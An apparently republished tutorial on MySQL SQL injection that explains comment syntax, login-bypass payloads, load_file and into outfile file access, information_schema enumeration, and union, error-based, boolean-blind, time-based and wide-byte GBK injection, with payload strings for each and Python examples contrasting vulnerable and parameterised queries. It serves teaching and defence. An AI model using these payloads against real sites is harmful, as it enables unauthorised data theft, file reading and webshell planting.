
Introduction to the basic knowledge of sql injection

2025-01-16 Update From: SLTechnology News&Howtos

Shulou(Shulou.com)05/31 Report--

This article introduces the basics of SQL injection against MySQL: comment syntax, authentication bypass, the built-in functions an attacker relies on, the information_schema metadata tables, and the main injection types (union-based, error-based, boolean blind and time-based blind), with example payloads for each.

What is SQL injection (SQL Injection)

SQL injection is an attack in which the attacker places SQL syntax in the input fields of a web form or in the query string of a page request so that the server builds and executes a malicious SQL statement. Wherever user input is used directly to construct (or influence) a dynamic SQL statement, or is passed unchecked as a parameter to a stored procedure, the form is vulnerable to SQL injection.

Common MySQL comment syntax

#                   single-line comment to the end of the line

-- [space] or --+   single-line comment; MySQL requires whitespace after "--", and "+" decodes to a space in a URL query string

/* ... */           multi-line comment (a /*! ... */ "version comment" is executed by MySQL, not ignored)

When injecting through a URL, these comment sequences usually have to be URL-encoded (for example "#" as %23, because a raw "#" is treated as a fragment and never reaches the server).

MySQL authentication bypass

' or 1 #

'/*!or*/1-- +

The first payload closes the username literal, adds an always-true condition and comments out the rest of the WHERE clause. The second hides the keyword inside a /*! ... */ version comment, which MySQL executes as ordinary SQL, to get past a filter that blocks "or".
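To make the bypass concrete, the following is an added example (not code from the original article): a login query built by string formatting beside its parameterised form, run against a constructed in-memory sqlite3 table that stands in for the MySQL users table. sqlite3 has no "#" comment, so the payload uses "-- " as the comment marker; the mechanism is otherwise the same as the article's ' or 1 #. The table contents and function names are assumptions made for the example.

```python
import sqlite3

# Constructed stand-in for the "users" table the article queries. sqlite3 is used
# only so the example runs offline; MySQL accepts the same payload with "#" in
# place of "-- " as the comment marker.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("create table users (username text, password text)")
    conn.executemany("insert into users values (?, ?)",
                     [("zhangsan", "s3cret"), ("admin", "hunter2")])
    return conn

def login_vulnerable(conn, username, password):
    # String-built query: the attacker's quote ends the literal, "or 1" makes the
    # WHERE clause always true, and the comment swallows the password check.
    sql = ("select username from users where username='%s' and password='%s'"
           % (username, password))
    row = conn.execute(sql).fetchone()
    return row[0] if row else None

def login_fixed(conn, username, password):
    # Parameterised query: the driver sends the values separately from the SQL
    # text, so the quote and the comment marker are just characters in a string.
    sql = "select username from users where username=? and password=?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None

PAYLOAD = "' or 1 -- "   # sqlite spelling of the article's  ' or 1 #

if __name__ == "__main__":
    db = make_db()
    print(login_vulnerable(db, PAYLOAD, "anything"))  # logs in as the first user: zhangsan
    print(login_fixed(db, PAYLOAD, "anything"))       # None: no such user
```

The vulnerable function returns the first row of the table because the WHERE clause has collapsed to "username='' or 1"; the fixed function compares the literal string "' or 1 -- " against the username column and finds nothing.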

String concatenation in MySQL

MySQL does not concatenate strings with "+"; "+" is always arithmetic. In the statement below both "a" and "b" are cast to the number 0, so "a" + "b" evaluates to 0, and the string "ab" is cast to 0 for the comparison as well:

select * from users where username='zhangsan' and "ab" = "a" + "b";   # true, but only because 0 = 0

To concatenate, use concat() (or place string literals next to each other, 'a' 'b'); "||" is a logical OR unless the PIPES_AS_CONCAT SQL mode is enabled.

Common functions in MySQL

SQL injection leans on MySQL's built-in functions. They fall into two groups: information functions, which return facts about the server and the current session, and utility functions, which perform an operation on data.

The commonly used information functions are:

database(): returns the name of the database currently in use.

version(): returns the server version, equivalent to @@version.

user(): returns the user the client connected as; current_user() returns the account MySQL actually authenticated as (usually, but not always, the same). For example:

select user();          # root@localhost
select current_user();  # root@localhost

@@datadir: the directory where the server stores its data files.

select @@datadir;       # D:\xampp\mysql\data\

Common utility functions are:

load_file(): reads a file from the database server's filesystem and returns its contents. It needs the FILE privilege, and secure_file_priv must allow the path.

select * from users union select 1, load_file('/etc/passwd'), 3;
select * from users union select 1, load_file(0x2F6574632F706173737764), 3;   # the hex literal 0x2F6574632F706173737764 is '/etc/passwd'; it avoids single quotes when they are filtered

into outfile: writes the result to a file, provided the mysqld process can write to the directory, the file does not already exist, and the FILE privilege and secure_file_priv allow it.

select '...' into outfile '/var/www/html/xxx.php';
select char(60, 63, ...) into outfile '/var/www/html/xxx.php';   # char() builds the payload from byte values (60 = '<', 63 = '?') when quotes are filtered

concat(): returns the concatenation of its arguments; if any argument is NULL the result is NULL.

Usage:

select concat(username, password) from users;

concat_ws(): a variant of concat() whose first argument is a separator placed between the remaining arguments (NULL arguments are skipped rather than nulling the result).

select concat_ws(',', username, password) from users;

group_concat(): merges values from multiple rows into one string, so a whole column comes back in a single result row.

Usage:

select group_concat(username) from users;   # all user names in the users table, returned as one record

The output is truncated at group_concat_max_len (1024 bytes by default), so long table or column lists may have to be paged with limit instead.

substring(), substr(), mid(): take a substring. Usage: substr(str, pos, length). Note that pos starts at 1, not 0.

select substr((select database()), 1);   # from position 1 to the end; substr(..., 1, 1) takes a single character, which is how blind injection reads a string one character at a time

ascii(): returns the ASCII code of the first character of its argument.

select ascii('a');   # 97

length(): returns the length of a string in bytes.

For example:

select length("123456");   # returns 6

if(expr1, expr2, expr3): returns expr2 if expr1 is true, otherwise expr3.

For example:

select 1, 2, if(1 > 2, 3, 4);   # 1, 2, 4

These are the functions used most often in SQL injection work. A few others come up less frequently:

now(): returns the current system time.

hex(): returns the hexadecimal representation of a string.

unhex(): the inverse of hex().

@@basedir: the MySQL installation directory.

@@version_compile_os: the operating system the server was built for.

MySQL database metadata

information_schema is a virtual database in MySQL that describes every other database the server holds: database names, tables, column names, privileges and so on. The tables used most often in information_schema are:

schemata: lists every database on the server; its content matches the output of show databases.

tables: lists the tables in each database, with the schema each table belongs to, its type and its storage engine.

The output of show tables from security comes from this table.

columns: lists every column of every table and the details of each column.

The output of show columns from users comes from this table.

The following uses these three tables to enumerate the database:

select database();                                                                          # current database
select schema_name from information_schema.schemata limit 0,1;                              # databases, one per limit offset
select table_name from information_schema.tables where table_schema=database() limit 0,1;   # tables in the current database
select column_name from information_schema.columns where table_name='users' limit 0,1;      # columns of the users table

The last query matches a table called users in any schema; add "and table_schema=database()" when the name is not unique on the server.

SQL injection types

SQL injection can be divided into conventional injection, where query results or error messages appear in the response, and blind injection, where they do not. Blind injection is in turn divided into time-based blind injection and boolean (content-based) blind injection.

Blind injection is explained at length elsewhere, so the concept is only illustrated here with concrete examples.

Time-based (delay) injection mostly relies on the if() and sleep() functions. The basic statements look like this:

select * from users where id=1 and if(length(user())=14, sleep(3), 1);      # pauses 3 seconds only if user() is 14 characters long (root@localhost is)
select * from users where id=1 and if(mid(user(),1,1)='r', sleep(3), 1);    # pauses 3 seconds only if the first character of user() is 'r'

Wide byte injection

Wide byte injection is covered in detail in dedicated write-ups; only the essentials are given here. It arises when the encoding the web application escapes with does not match the (multi-byte) character set of the database connection, typically GBK. The escaping routine turns ' into \' (bytes 0x5c 0x27); if the attacker precedes the quote with a byte such as %df or %d5, MySQL decodes 0xdf 0x5c as a single two-byte GBK character, the backslash is swallowed, and the quote is live again. The usual bypass is therefore %df' or %d5' in place of a plain quote.
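As an added illustration that is not part of the original article, the following Python reproduces the byte-level mechanics: a constructed addslashes-style escaper puts a backslash before each quote, and the escaped bytes are then decoded as GBK and as UTF-8 to show where the backslash goes. The PAYLOAD bytes, the escaper and the function names are assumptions made for the example; MySQL itself is not involved, only the decoding it would perform.

```python
def escape_quotes(data: bytes) -> bytes:
    """Byte-oriented escaping in the style of addslashes()/mysql_escape_string():
    a backslash (0x5c) is put in front of every quote and backslash. Constructed
    for the example; it ignores the connection charset, which is the whole problem."""
    out = bytearray()
    for b in data:
        if b in (0x27, 0x22, 0x5c):   # ' " \
            out.append(0x5c)
        out.append(b)
    return bytes(out)

def server_sees(payload: bytes, charset: str) -> str:
    """Escape the raw bytes the way the web tier would, then decode them the way
    the database would for a connection using `charset`."""
    return escape_quotes(payload).decode(charset, errors="replace")

def quote_is_escaped(payload: bytes, charset: str) -> bool:
    """True if, after decoding, the first quote is still preceded by a backslash."""
    decoded = server_sees(payload, charset)
    i = decoded.find("'")
    return i > 0 and decoded[i - 1] == "\\"

# Constructed payload: the URL-decoded form of  %df'  followed by the rest of an injection.
PAYLOAD = b"\xdf' or 1=1 #"

if __name__ == "__main__":
    print(repr(server_sees(PAYLOAD, "gbk")))    # 0xdf 0x5c became one CJK character; the quote is live
    print(repr(server_sees(PAYLOAD, "utf-8")))  # 0xdf alone is invalid UTF-8; the backslash still escapes the quote
    print(quote_is_escaped(PAYLOAD, "gbk"), quote_is_escaped(PAYLOAD, "utf-8"))  # False True
```

Under GBK the decoded string is exactly as long as the original payload: the lead byte and the backslash merged into one character, so the quote that follows terminates the SQL literal. Under UTF-8 the lone 0xdf becomes a replacement character and the backslash survives, which is why keeping the application and connection character sets consistent (or using mysql_real_escape_string/prepared statements, which know the connection charset) removes the bug.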

Summary of commonly used MySQL statements

Conventional injection

Find the number of columns (raise num until the query errors):
1' order by num #

Confirm the number of columns:
1' union select 1,2,3 #

A non-matching id makes the page display the union row, which shows which columns are echoed:
-1' union select 1,2,3 #

List all databases:
-1' union select 1,2,group_concat(schema_name) from information_schema.schemata #

List the tables of a database (database() or the hex literal of the name can replace "dbname" when quotes are filtered):
-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema="dbname" #

List the columns of a table, one per limit offset:
-1' union select 1,2,column_name from information_schema.columns where table_name="table_name" limit 0,1 #

List all columns at once (the hex literal of the table name works here too):
-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name="table_name" #

When the comment character is filtered, leave the last literal open so the application's own closing quote completes the statement, for example:
-1' union select 1,2,'3

Double query (error-based) injection

select concat(0x3a,0x3a,(select database()),0x3a,0x3a);
select count(*), concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2)) a from information_schema.tables group by a;   # leaks the database name through the error message
select count(*), concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x3a,0x3a,floor(rand()*2)) a from information_schema.tables group by a;   # leaks table names, one per limit offset

Used at an injection point:

1' AND (select 1 from (select count(*), concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x3a,0x3a,floor(rand()*2)) a from information_schema.tables group by a) b)-- +

This technique extracts information through the error MySQL raises rather than through query output: grouping on a key that contains floor(rand()*2) makes MySQL try to insert the same key twice into its temporary table, and the resulting "Duplicate entry '::name::1' for key 'group_key'" message carries the selected value back to the page. Because rand() is unseeded the collision is probabilistic, so the request may need repeating (the seeded floor(rand(0)*2) is commonly used to make it deterministic). It is analysed in detail in a later article.

Boolean blind injection

1' and ascii(substr((select database()),1,1)) > 99 #
1' and ascii(substr((select table_name from information_schema.tables limit 0,1),1,1)) > 90 #

(Add "where table_schema=database()" to the second query to skip information_schema's own tables, which otherwise come first.)

Boolean blind injection relies on the page content differing according to whether the injected condition evaluates to true or false; each request answers one yes/no question about the data, and the answers are combined to recover it.

Time-based blind injection

1' AND if((select substr(table_name,1,1) from information_schema.tables where table_schema=database() limit 0,1)='e', sleep(10), null)-- +
1' AND if(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)='e', sleep(10), null)-- +

The two forms are equivalent. Time-based blind injection differs from conventional injection in that nothing about the data appears in the response: it generally combines if() with sleep(), and whether sleep() ran is judged from how long the page takes to come back rather than from its content.

Each request therefore answers one yes/no question, and the required information is recovered one such answer at a time.

This concludes the introduction to the basics of SQL injection. Thank you for reading.
